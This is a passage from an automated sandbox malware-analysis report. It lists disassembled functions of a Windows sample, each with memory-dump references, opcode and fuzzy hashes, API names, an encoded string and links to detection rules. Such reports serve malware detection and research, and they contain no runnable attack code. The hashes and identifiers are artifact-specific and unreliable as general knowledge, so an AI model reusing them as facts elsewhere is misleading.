                                                                                                                                                                                                                                  • Associated: 0000000F.00000002.2138744359.0000000000438000.00000008.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000F.00000002.2138744359.000000000043C000.00000008.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_15_2_400000_7g1UcaWDIadEWTPuXfBgjhjE.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                                                  • Opcode ID: a578235fd7ef3aed2a2d552e65bc1af2bfd9bf356f91058c6dae311955d0e3a7
                                                                                                                                                                                                                                  • Instruction ID: 373024fc2fed516bdc636a623b7a3c01618f37309bfd328d060bf71c45cb50f6
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: a578235fd7ef3aed2a2d552e65bc1af2bfd9bf356f91058c6dae311955d0e3a7
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 2FE18A75E05269CFEB64CF68C980B99BBB1BB48300F1081EAD84DA7381D774AE85CF55
                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                  Function 00409302 Relevance: 5.3, APIs: 4, Instructions: 276COMMON
                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 0000000F.00000002.2137949924.0000000000401000.00000020.00000001.01000000.00000010.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 0000000F.00000002.2137864862.0000000000400000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000F.00000002.2138031553.000000000040A000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000F.00000002.2138064237.000000000040B000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000F.00000002.2138144454.0000000000412000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000F.00000002.2138144454.000000000041E000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000F.00000002.2138144454.000000000042A000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000F.00000002.2138144454.0000000000434000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000F.00000002.2138144454.0000000000437000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000F.00000002.2138744359.0000000000438000.00000008.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000F.00000002.2138744359.000000000043C000.00000008.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_15_2_400000_7g1UcaWDIadEWTPuXfBgjhjE.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                                                  • Opcode ID: 1580e02ebf7c4fca29966eb1b7433a0a3187ed73c579ff4eb24ab240cbf4b120
                                                                                                                                                                                                                                  • Instruction ID: a08f90893e9a4040dbcaa68aabc4f5c37fecb49a8b953bcbec771c1c1b16f75e
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 1580e02ebf7c4fca29966eb1b7433a0a3187ed73c579ff4eb24ab240cbf4b120
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: D1E18974E05269CFEB64CF68C984BA9BBB1BB48300F1481EAD859B7381D7349E85CF15
                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                  Function 00409193 Relevance: 5.3, APIs: 4, Instructions: 274memoryCOMMON
                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 0000000F.00000002.2137949924.0000000000401000.00000020.00000001.01000000.00000010.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 0000000F.00000002.2137864862.0000000000400000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000F.00000002.2138031553.000000000040A000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000F.00000002.2138064237.000000000040B000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000F.00000002.2138144454.0000000000412000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000F.00000002.2138144454.000000000041E000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000F.00000002.2138144454.000000000042A000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000F.00000002.2138144454.0000000000434000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000F.00000002.2138144454.0000000000437000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000F.00000002.2138744359.0000000000438000.00000008.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000F.00000002.2138744359.000000000043C000.00000008.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_15_2_400000_7g1UcaWDIadEWTPuXfBgjhjE.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: Global$AllocFree
                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                  • API String ID: 3394109436-0
                                                                                                                                                                                                                                  • Opcode ID: 1376a99fa1b3c8b711226efaa9cd125e7b0aae65b997332d787d10eea2378ea6
                                                                                                                                                                                                                                  • Instruction ID: cf37d5954fa70898b434e0d26c6706b10c8171271484cbeb9454a15f2979c00d
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 1376a99fa1b3c8b711226efaa9cd125e7b0aae65b997332d787d10eea2378ea6
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 58E19B74E05269CFEB64CF68C984BA9BBB1BB48300F1485EAD849A7381D7349E85CF15
                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                  Function 00409128 Relevance: 5.3, APIs: 4, Instructions: 253COMMON
                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 0000000F.00000002.2137949924.0000000000401000.00000020.00000001.01000000.00000010.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 0000000F.00000002.2137864862.0000000000400000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000F.00000002.2138031553.000000000040A000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000F.00000002.2138064237.000000000040B000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000F.00000002.2138144454.0000000000412000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000F.00000002.2138144454.000000000041E000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000F.00000002.2138144454.000000000042A000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000F.00000002.2138144454.0000000000434000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000F.00000002.2138144454.0000000000437000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000F.00000002.2138744359.0000000000438000.00000008.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000F.00000002.2138744359.000000000043C000.00000008.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_15_2_400000_7g1UcaWDIadEWTPuXfBgjhjE.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                                                  • Opcode ID: 0d3edd96235aad2e448edd85fe0051959f4d3e71b7dd2dead95b0c62df9fb41c
                                                                                                                                                                                                                                  • Instruction ID: 6ef1666d030b3683f745449ade9432935f6c1ed2423b4b2fea7fa3c30e0d11e8
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 0d3edd96235aad2e448edd85fe0051959f4d3e71b7dd2dead95b0c62df9fb41c
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: DFD169B4D05269CFEB64CF68C984B99BBB1BB48300F1081EAD84DA7391D734AE85CF55
                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                  Function 00409285 Relevance: 5.2, APIs: 4, Instructions: 248COMMON
                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 0000000F.00000002.2137949924.0000000000401000.00000020.00000001.01000000.00000010.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 0000000F.00000002.2137864862.0000000000400000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000F.00000002.2138031553.000000000040A000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000F.00000002.2138064237.000000000040B000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000F.00000002.2138144454.0000000000412000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000F.00000002.2138144454.000000000041E000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000F.00000002.2138144454.000000000042A000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000F.00000002.2138144454.0000000000434000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000F.00000002.2138144454.0000000000437000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000F.00000002.2138744359.0000000000438000.00000008.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000F.00000002.2138744359.000000000043C000.00000008.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_15_2_400000_7g1UcaWDIadEWTPuXfBgjhjE.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                                                  • Opcode ID: b40b5ad18bbb895345efcde55e0179b9719697a428ab1875b5866f95c7fbef08
                                                                                                                                                                                                                                  • Instruction ID: 98c6a34e011fea02c5fd1f307661bc496968a447f3de359247ec3e7382062383
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: b40b5ad18bbb895345efcde55e0179b9719697a428ab1875b5866f95c7fbef08
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 54D178B4D052698FEB64CF68C980B99BBB1BB48300F1481EAD84DA7381D734AE85CF55
                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                  Function 0040925A Relevance: 5.2, APIs: 4, Instructions: 247COMMON
                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 0000000F.00000002.2137949924.0000000000401000.00000020.00000001.01000000.00000010.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 0000000F.00000002.2137864862.0000000000400000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000F.00000002.2138031553.000000000040A000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000F.00000002.2138064237.000000000040B000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000F.00000002.2138144454.0000000000412000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000F.00000002.2138144454.000000000041E000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000F.00000002.2138144454.000000000042A000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000F.00000002.2138144454.0000000000434000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000F.00000002.2138144454.0000000000437000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000F.00000002.2138744359.0000000000438000.00000008.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000F.00000002.2138744359.000000000043C000.00000008.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_15_2_400000_7g1UcaWDIadEWTPuXfBgjhjE.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                                                  • Opcode ID: d5d30ce3705b240a9fa9085b13145e6071c26e30a1f734f08b0bddea23f27e83
                                                                                                                                                                                                                                  • Instruction ID: bea8f09e258bf7577ce88e7167e750fa30ab14cfac5afba0003b10e989aa1f51
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: d5d30ce3705b240a9fa9085b13145e6071c26e30a1f734f08b0bddea23f27e83
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 9FD169B4D05269CFEB64CF68C984B99BBB1BB48300F1481EAD849B7381D734AE85CF55
                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                  Function 00409157 Relevance: 5.2, APIs: 4, Instructions: 244COMMON
                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 0000000F.00000002.2137949924.0000000000401000.00000020.00000001.01000000.00000010.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 0000000F.00000002.2137864862.0000000000400000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000F.00000002.2138031553.000000000040A000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000F.00000002.2138064237.000000000040B000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000F.00000002.2138144454.0000000000412000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000F.00000002.2138144454.000000000041E000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000F.00000002.2138144454.000000000042A000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000F.00000002.2138144454.0000000000434000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000F.00000002.2138144454.0000000000437000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000F.00000002.2138744359.0000000000438000.00000008.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000F.00000002.2138744359.000000000043C000.00000008.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_15_2_400000_7g1UcaWDIadEWTPuXfBgjhjE.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                                                  • Opcode ID: bafe15afffcb6701d4c5351ddd9df98beec2791fc1c3a27858b249eb881a6424
                                                                                                                                                                                                                                  • Instruction ID: cf999dc1e13fdb9e3b794afb24179b6ab6f8fffdfeb4e36a57addd35a861b0c2
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: bafe15afffcb6701d4c5351ddd9df98beec2791fc1c3a27858b249eb881a6424
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: DCC17A74D05269CFEB64CF68C980B99BBB1BB48300F1481EAD849B7381D734AE85CF55
                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                  Function 004096F9 Relevance: 5.2, APIs: 4, Instructions: 230COMMON
                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 0000000F.00000002.2137949924.0000000000401000.00000020.00000001.01000000.00000010.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 0000000F.00000002.2137864862.0000000000400000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000F.00000002.2138031553.000000000040A000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000F.00000002.2138064237.000000000040B000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000F.00000002.2138144454.0000000000412000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000F.00000002.2138144454.000000000041E000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000F.00000002.2138144454.000000000042A000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000F.00000002.2138144454.0000000000434000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000F.00000002.2138144454.0000000000437000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000F.00000002.2138744359.0000000000438000.00000008.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000F.00000002.2138744359.000000000043C000.00000008.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_15_2_400000_7g1UcaWDIadEWTPuXfBgjhjE.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                                                  • Opcode ID: cff38268b4a69b6e7d209897343a178ab99337e8fe27efdfc199a24eb5041e59
                                                                                                                                                                                                                                  • Instruction ID: a16c7d6d65317efe9c57d887f34a02eee03e71a6b958f13de8b6000bf5c2667a
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: cff38268b4a69b6e7d209897343a178ab99337e8fe27efdfc199a24eb5041e59
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: E8C17BB4D05269CFDB64CF68C984B99BBB1BB48300F1081EAD84DA7381D734AE85CF15
                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                  Function 00402E4B Relevance: 4.6, APIs: 3, Instructions: 89registryCOMMON
                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 0000000F.00000002.2137949924.0000000000401000.00000020.00000001.01000000.00000010.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 0000000F.00000002.2137864862.0000000000400000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000F.00000002.2138031553.000000000040A000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000F.00000002.2138064237.000000000040B000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000F.00000002.2138144454.0000000000412000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000F.00000002.2138144454.000000000041E000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000F.00000002.2138144454.000000000042A000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000F.00000002.2138144454.0000000000434000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000F.00000002.2138144454.0000000000437000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000F.00000002.2138744359.0000000000438000.00000008.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000F.00000002.2138744359.000000000043C000.00000008.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_15_2_400000_7g1UcaWDIadEWTPuXfBgjhjE.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: CloseCreateValue
                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                  • API String ID: 1818849710-0
                                                                                                                                                                                                                                  • Opcode ID: 34cad2bc1fa3e13494afe16162c9cd95c8c0f10228bda9fb96df882e3ad3404d
                                                                                                                                                                                                                                  • Instruction ID: aa20071d88737d2ca076d9582247293cc4c89cd0404862d20b3ad10084441af9
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 34cad2bc1fa3e13494afe16162c9cd95c8c0f10228bda9fb96df882e3ad3404d
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 813150B09083018FD710EF25C94835ABBF4FB84315F10886EF489A7391D7799A89DF9A
                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                  Function 00403AE9 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 23fileCOMMON
                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 0000000F.00000002.2137949924.0000000000401000.00000020.00000001.01000000.00000010.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 0000000F.00000002.2137864862.0000000000400000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000F.00000002.2138031553.000000000040A000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000F.00000002.2138064237.000000000040B000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000F.00000002.2138144454.0000000000412000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000F.00000002.2138144454.000000000041E000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000F.00000002.2138144454.000000000042A000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000F.00000002.2138144454.0000000000434000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000F.00000002.2138144454.0000000000437000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000F.00000002.2138744359.0000000000438000.00000008.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000F.00000002.2138744359.000000000043C000.00000008.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_15_2_400000_7g1UcaWDIadEWTPuXfBgjhjE.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: FileRead
                                                                                                                                                                                                                                  • String ID: <@
                                                                                                                                                                                                                                  • API String ID: 2738559852-4072043054
                                                                                                                                                                                                                                  • Opcode ID: d6535b1fd4e4f43d190a1083287ca5501c92c386e3f1a77b6dec29ccffe7340a
                                                                                                                                                                                                                                  • Instruction ID: af84ff8d7bbf5bb76e19132ef8cd2b24e5e30c6edf1d6b1d64d2a00a1082e161
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: d6535b1fd4e4f43d190a1083287ca5501c92c386e3f1a77b6dec29ccffe7340a
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 1EF0ACB1904309AFC700EF69C58454EBBF4AB48354F408839E85993251E734E604CF56
                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                  Function 00403141 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 11COMMON
                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  • FindCloseChangeNotification.KERNEL32 ref: 00403159
                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                  • 62lP/4uOUYfKA3tfxllnPzQXGLJgRjFKHZbIa8JtXF+oMlF4/GglqDQr8FrkYyAg2UYkxW9kefTa, xrefs: 00403141
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 0000000F.00000002.2137949924.0000000000401000.00000020.00000001.01000000.00000010.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 0000000F.00000002.2137864862.0000000000400000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000F.00000002.2138031553.000000000040A000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000F.00000002.2138064237.000000000040B000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000F.00000002.2138144454.0000000000412000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000F.00000002.2138144454.000000000041E000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000F.00000002.2138144454.000000000042A000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000F.00000002.2138144454.0000000000434000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000F.00000002.2138144454.0000000000437000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000F.00000002.2138744359.0000000000438000.00000008.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000F.00000002.2138744359.000000000043C000.00000008.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_15_2_400000_7g1UcaWDIadEWTPuXfBgjhjE.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: ChangeCloseFindNotification
                                                                                                                                                                                                                                  • String ID: 62lP/4uOUYfKA3tfxllnPzQXGLJgRjFKHZbIa8JtXF+oMlF4/GglqDQr8FrkYyAg2UYkxW9kefTa
                                                                                                                                                                                                                                  • API String ID: 2591292051-244690609
                                                                                                                                                                                                                                  • Opcode ID: 7220984d86149b75493436dbbda63972d97fcd78ed879eff71d07d38dd4f9017
                                                                                                                                                                                                                                  • Instruction ID: cae25ad1085ea1b7b33e0ee8e1dfa0938857f6c35aa13dd2a3c4ee0daf51729b
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 7220984d86149b75493436dbbda63972d97fcd78ed879eff71d07d38dd4f9017
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 1FC012B180D7519FC3016F3068494657FB06E11305756487EF8C1A6093D73845048657
                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                  Function 0040322E Relevance: 3.1, APIs: 2, Instructions: 85fileCOMMON
                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  • ReadFile.KERNEL32 ref: 00403292
                                                                                                                                                                                                                                  • SetFilePointer.KERNEL32 ref: 00403316
                                                                                                                                                                                                                                    • Part of subcall function 00407BE3: wsprintfA.USER32 ref: 00407BFE
                                                                                                                                                                                                                                  Memory Dump Source
